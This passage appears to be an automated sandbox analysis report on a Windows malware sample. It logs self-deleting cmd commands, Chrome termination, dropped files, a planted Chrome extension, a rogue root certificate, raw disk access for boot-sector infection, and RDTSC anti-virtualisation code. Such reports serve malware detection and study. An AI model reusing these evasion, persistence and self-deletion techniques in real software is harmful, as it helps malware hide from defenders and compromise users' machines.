Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Process created: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe C:\Users\user\AppData\Local\Temp\6272167835D47591.exe 200 user01	Jump to behavior
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\Desktop\N1yprTBBXs.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Process created: C:\Users\user\AppData\Roaming\1611970727133.exe 'C:\Users\user\AppData\Roaming\1611970727133.exe' /sjson 'C:\Users\user\AppData\Roaming\1611970727133.txt'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\6272167835D47591.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\6272167835D47591.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c taskkill /f /im chrome.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\6272167835D47591.exe'	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im chrome.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3

Source: C:\Windows\SysWOW64\msiexec.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{000C103E-0000-0000-C000-000000000046}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe	Automated click: Next >
Source: C:\Windows\SysWOW64\msiexec.exe	Automated click: Next >
Source: C:\Windows\SysWOW64\msiexec.exe	Automated click: Install

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: N1yprTBBXs.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: N1yprTBBXs.exe

Static file information: File size 4999496 > 1048576

Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe

File opened: C:\Users\user\AppData\Local\Temp\download\msvcr71.dll

Jump to behavior

Source: N1yprTBBXs.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x11fe00

Source: N1yprTBBXs.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: N1yprTBBXs.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: N1yprTBBXs.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: N1yprTBBXs.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: N1yprTBBXs.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: N1yprTBBXs.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: N1yprTBBXs.exe

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source: N1yprTBBXs.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdb source: MiniThunderPlatform.exe.2.dr
Source:	Binary string: c:\Projects\VS2005\EdgeCookiesView\Release\EdgeCookiesView.pdb source: 1611970727133.exe, 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp, 1611970727133.exe.2.dr
Source:	Binary string: atl71.pdbT source: atl71.dll.2.dr
Source:	Binary string: msvcr71.pdb\ source: msvcr71.dll.2.dr
Source:	Binary string: cmd_insert_server.icex-conference/x-cooltalk.movievideo/x-sgi-movievideo/x-msvideo.mxuvideo/vnd.mpegurl.qtvideo/quicktimevideo/mpeg.xmltext/xml.etxtext/x-setext.wmlstext/vnd.wap.wmlscript.wmltext/vnd.wap.wml.tsvtext/tab-separated-values.sgmtext/sgml.rtftext/rtf.rtxtext/richtext.txttext/plain.html.csstext/css.mshmodel/mesh.igsmodel/iges.xwdimage/x-xwindowdump.xpmimage/x-xpixmap.xbmimage/x-xbitmap.rgbimage/x-rgb.ppmimage/x-portable-pixmap.bgmimage/x-portable-graymap.pbmimage/x-portable-bitmap.pnmimage/x-portable-anymap.rasimage/x-cmu-raster.wbmpimage/vnd.wap.wbmp.djvimage/vnd.djvu.tiffimage/tiff.pngimage/png.jpgimage/jpeg.iefimage/ief.gifimage/gif.bmpimage/bmp.xyzchemical/x-xyz.pdbchemical/x-pdb.wavaudio/x-wavaudio/x-realaudio.arpmaudio/x-pn-realaudio-pluginaudio/x-pn-realaudio.m3uaudio/x-mpegurl.aifaudio/x-aiffaudio/mpeg.midiaudio/midiapplication/application/zip.xhtmlapplication/xhtml+xml.srcapplication/x-wais-source.ustarapplication/x-ustar.msapplication/x-troff-ms.meapplication/x-troff-me.manapplication/x-troff-man.texiapplication/x-texinfo.texapplication/x-tex.tclapplication/x-tclapplication/x-tar.sv4crcapplication/x-sv4crc.sv4cpioapplication/x-sv4cpio.sitapplication/x-stuffit.swfapplication/x-shockwave-flash.sharapplication/x-shar.shapplication/x-sh.latexapplication/x-latex.jsapplication/x-javascript.hdfapplication/x-hdf.gtarapplication/x-gtar.splapplication/x-futuresplash.dviapplication/x-dvi.cshapplication/x-csh.cpioapplication/x-cpio.pgnapplication/x-chess-pgn.vcdapplication/x-cdlink.bcpioapplication/x-bcpio.wmlscapplication/vnd.wap.wmlscriptc.wmlcapplication/vnd.wap.wmlc.wbxmlapplication/vnd.wap.wbxml.pptapplication/vnd.ms-powerpoint.xlsapplication/vnd.ms-excel.mifapplication/vnd.mif.smiapplication/smil.pdfapplication/pdf.odaapplication/oda.docapplication/msword.cptapplication/mac-compactpro.hqxapplication/mac-binhex40.ezapplication/andrew-inset source: download_engine.dll.2.dr
Source:	Binary string: d:\MiniDownloadLib\branches\bin\Product Release\download_engine.pdb source: download_engine.dll.2.dr
Source:	Binary string: atl71.pdb source: atl71.dll.2.dr
Source:	Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdbpJ source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp
Source:	Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdbt source: MiniThunderPlatform.exe.2.dr
Source:	Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\xldl.pdb source: xldl.dll.2.dr
Source:	Binary string: msvcp71.pdb source: msvcp71.dll.2.dr
Source:	Binary string: e:\xl7\Product Release\dl_peer_id.pdb0 source: dl_peer_id.dll.2.dr
Source:	Binary string: p:\p\agents\hpam2.eem\recipes\499894881\base\branches\goopy2_release_branch\googleclient\ime\goopy\scons-out\opt\obj\syncer\daemon_unsigned.pdb source: N1yprTBBXs.exe
Source:	Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdb source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp
Source:	Binary string: d:\workspace\xlframework\win32_component\ThunderFW\Release\ThunderFW.pdb source: ThunderFW.exe, 00000019.00000002.333505191.0000000000B1C000.00000002.00020000.sdmp, ThunderFW.exe.2.dr
Source:	Binary string: f:\sys\objfre_win7_amd64\amd64\FsFilter64.pdb source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp
Source:	Binary string: e:\xl7\Product Release\dl_peer_id.pdb source: dl_peer_id.dll.2.dr
Source:	Binary string: msvcr71.pdb source: msvcr71.dll.2.dr
Source:	Binary string: d:\BranchAI\launcher\Release\fileLauncher.pdb source: MSI1983.tmp.1.dr

Source: N1yprTBBXs.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: N1yprTBBXs.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: N1yprTBBXs.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: N1yprTBBXs.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: N1yprTBBXs.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation:

Detected unpacking (creates a PE file in dynamic memory)

Show sources

Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Unpacked PE file: 0.2.N1yprTBBXs.exe.2750000.2.unpack
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Unpacked PE file: 2.2.6272167835D47591.exe.2880000.4.unpack
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Unpacked PE file: 4.2.6272167835D47591.exe.2730000.5.unpack

Source: C:\Users\user\Desktop\N1yprTBBXs.exe

Code function: 0_2_00414280 PathCombineW,LoadLibraryW,GetProcAddress,FreeLibrary,

0_2_00414280

Source: N1yprTBBXs.exe	Static PE information: real checksum: 0x195ad2 should be: 0x4cf583
Source: MSI1983.tmp.1.dr	Static PE information: real checksum: 0x0 should be: 0x2d22
Source: 6272167835D47591.exe.0.dr	Static PE information: real checksum: 0x195ad2 should be: 0x4cf583

Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Code function: 0_2_004F001D push esp; ret	0_2_004F01CF
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Code function: 0_2_004620E0 push ecx; mov dword ptr [esp], 00000000h	0_2_004620E1
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Code function: 0_2_004F01A7 push esp; ret	0_2_004F01CF
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Code function: 0_2_00406260 push ecx; mov dword ptr [esp], 00000000h	0_2_00406261
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Code function: 0_2_004F6375 push ecx; ret	0_2_004F6388
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Code function: 0_2_004F47DA push ecx; ret	0_2_004F47ED
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Code function: 2_2_10010579 push ecx; ret	2_2_1001058C
Source: C:\Users\user\AppData\Roaming\1611970727133.exe	Code function: 9_2_0040E2F1 push ecx; ret	9_2_0040E301
Source: C:\Users\user\AppData\Roaming\1611970727133.exe	Code function: 9_2_0040E340 push eax; ret	9_2_0040E354
Source: C:\Users\user\AppData\Roaming\1611970727133.exe	Code function: 9_2_0040E340 push eax; ret	9_2_0040E37C
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	Code function: 25_2_00B13FB5 push ecx; ret	25_2_00B13FC8

Persistence and Installation Behavior:

Contains functionality to infect the boot sector

Show sources

Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Code function: wsprintfW,CreateFileW,_memset,DeviceIoControl,_memset,CloseHandle, \\.\PhysicalDrive%d	2_2_1001DA70
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Code function: wsprintfW,CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d	2_2_1001D370
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Code function: _memset,wsprintfW,CreateFileW,DeviceIoControl,_memset,CloseHandle,CloseHandle, \\.\PhysicalDrive%d	2_2_1001D7E0

Installs new ROOT certificates

Show sources

Source: C:\Users\user\Desktop\N1yprTBBXs.exe

Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD Blob

Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe	File created: C:\Users\user\AppData\Local\Temp\MSI1983.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	File created: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe	Jump to dropped file
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	File created: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	File created: C:\Users\user\AppData\Roaming\1611970727133.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	File created: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	File created: C:\Users\user\AppData\Local\Temp\download\msvcp71.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	File created: C:\Users\user\AppData\Local\Temp\download\msvcr71.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	File created: C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	File created: C:\Users\user\AppData\Local\Temp\download\download_engine.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	File created: C:\Users\user\AppData\Local\Temp\xldl.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	File created: C:\Users\user\AppData\Local\Temp\download\atl71.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	File created: C:\Users\user\AppData\Local\Temp\download\zlib1.dll	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\eklhijcdkfafgjlcdgmbboagmpekiefg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\eklhijcdkfafgjlcdgmbboagmpekiefg\1.0.0.0_0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\eklhijcdkfafgjlcdgmbboagmpekiefg\1.0.0.0_0\icon.png	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\eklhijcdkfafgjlcdgmbboagmpekiefg\1.0.0.0_0\icon48.png	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\eklhijcdkfafgjlcdgmbboagmpekiefg\1.0.0.0_0\popup.html	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\eklhijcdkfafgjlcdgmbboagmpekiefg\1.0.0.0_0\background.js	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\eklhijcdkfafgjlcdgmbboagmpekiefg\1.0.0.0_0\book.js	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\eklhijcdkfafgjlcdgmbboagmpekiefg\1.0.0.0_0\jquery-1.8.3.min.js	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\eklhijcdkfafgjlcdgmbboagmpekiefg\1.0.0.0_0\popup.js	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\eklhijcdkfafgjlcdgmbboagmpekiefg\1.0.0.0_0\manifest.json	Jump to behavior

Boot Survival:

Contains functionality to infect the boot sector

Show sources

Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Code function: wsprintfW,CreateFileW,_memset,DeviceIoControl,_memset,CloseHandle, \\.\PhysicalDrive%d	2_2_1001DA70
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Code function: wsprintfW,CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d	2_2_1001D370
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Code function: _memset,wsprintfW,CreateFileW,DeviceIoControl,_memset,CloseHandle,CloseHandle, \\.\PhysicalDrive%d	2_2_1001D7E0

Hooking and other Techniques for Hiding and Protection:

Source: C:\Users\user\AppData\Roaming\1611970727133.exe

Code function: 9_2_0040C41D GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

9_2_0040C41D

Source: C:\Windows\SysWOW64\msiexec.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\1611970727133.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion:

Contains functionality to detect sleep reduction / modifications

Show sources

Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe

Code function: 2_2_100204C0

2_2_100204C0

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004EFB01 second address: 00000000004EFB07 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004EFB07 second address: 00000000004EFB20 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C67Ah 0x00000009 popad 0x0000000a popfd 0x0000000b push 00000005h 0x0000000d pushfd 0x0000000e pushad 0x0000000f xor ecx, ecx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004EFB20 second address: 00000000004EFB26 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004EFB26 second address: 00000000004EFB4B instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C683h 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, 004EFE72h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004EFB4B second address: 00000000004EFB51 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004EFB51 second address: 00000000004EFB74 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C685h 0x00000009 popad 0x0000000a popfd 0x0000000b push eax 0x0000000c pushfd 0x0000000d pushad 0x0000000e xor ecx, ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004EFB74 second address: 00000000004EFB7A instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004EFB7A second address: 00000000004EFB9B instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C67Fh 0x00000009 popad 0x0000000a popfd 0x0000000b push 000013C5h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004EFB9B second address: 00000000004EFBA1 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004EFBA1 second address: 00000000004EFBC1 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C67Eh 0x00000009 popad 0x0000000a popfd 0x0000000b push 004F06A6h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004EFBC1 second address: 00000000004EFBC7 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004EFBC7 second address: 00000000004EFBEA instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C681h 0x00000009 popad 0x0000000a popfd 0x0000000b mov ebx, 004EFED6h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004EFBEA second address: 00000000004EFBF0 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004EFBF0 second address: 00000000004EFEDD instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C682h 0x00000009 popad 0x0000000a popfd 0x0000000b call ebx 0x0000000d push ebp 0x0000000e mov ebp, esp 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004EFEDD second address: 00000000004EFEE3 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004EFEE3 second address: 00000000004EFF03 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C682h 0x00000009 popad 0x0000000a popfd 0x0000000b push ecx 0x0000000c pushfd 0x0000000d pushad 0x0000000e xor ecx, ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004EFF03 second address: 00000000004EFF09 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004EFF09 second address: 00000000004EFF31 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C684h 0x00000009 popad 0x0000000a popfd 0x0000000b mov dword ptr [ebp-04h], 00000000h 0x00000012 pushfd 0x00000013 pushad 0x00000014 xor ecx, ecx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004EFF31 second address: 00000000004EFF37 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004EFF37 second address: 00000000004EFF56 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C67Bh 0x00000009 popad 0x0000000a popfd 0x0000000b mov dword ptr [ebp-04h], 00000000h 0x00000012 pushfd 0x00000013 pushad 0x00000014 xor ecx, ecx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004EFF56 second address: 00000000004EFF5C instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004EFF5C second address: 00000000004F002E instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C67Ch 0x00000009 popad 0x0000000a popfd 0x0000000b jmp 00007F108C38C729h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004F002E second address: 00000000004F0034 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004F0034 second address: 00000000004F0062 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C685h 0x00000009 popad 0x0000000a popfd 0x0000000b mov ecx, dword ptr [ebp-04h] 0x0000000e cmp ecx, dword ptr [ebp+0Ch] 0x00000011 jnc 00007F108C38C889h 0x00000017 pushfd 0x00000018 pushad 0x00000019 xor ecx, ecx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004F0062 second address: 00000000004F0068 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004F0068 second address: 00000000004F0085 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C67Dh 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004F0085 second address: 00000000004F008B instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004F008B second address: 00000000004F00A5 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C67Bh 0x00000009 popad 0x0000000a popfd 0x0000000b xor edx, edx 0x0000000d pushfd 0x0000000e pushad 0x0000000f xor ecx, ecx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004F00A5 second address: 00000000004F00AB instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004F00AB second address: 00000000004F00C7 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C67Ch 0x00000009 popad 0x0000000a popfd 0x0000000b div dword ptr [ebp+14h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004F00C7 second address: 00000000004F00CD instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004F00CD second address: 00000000004F00EF instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C682h 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, dword ptr [ebp+10h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
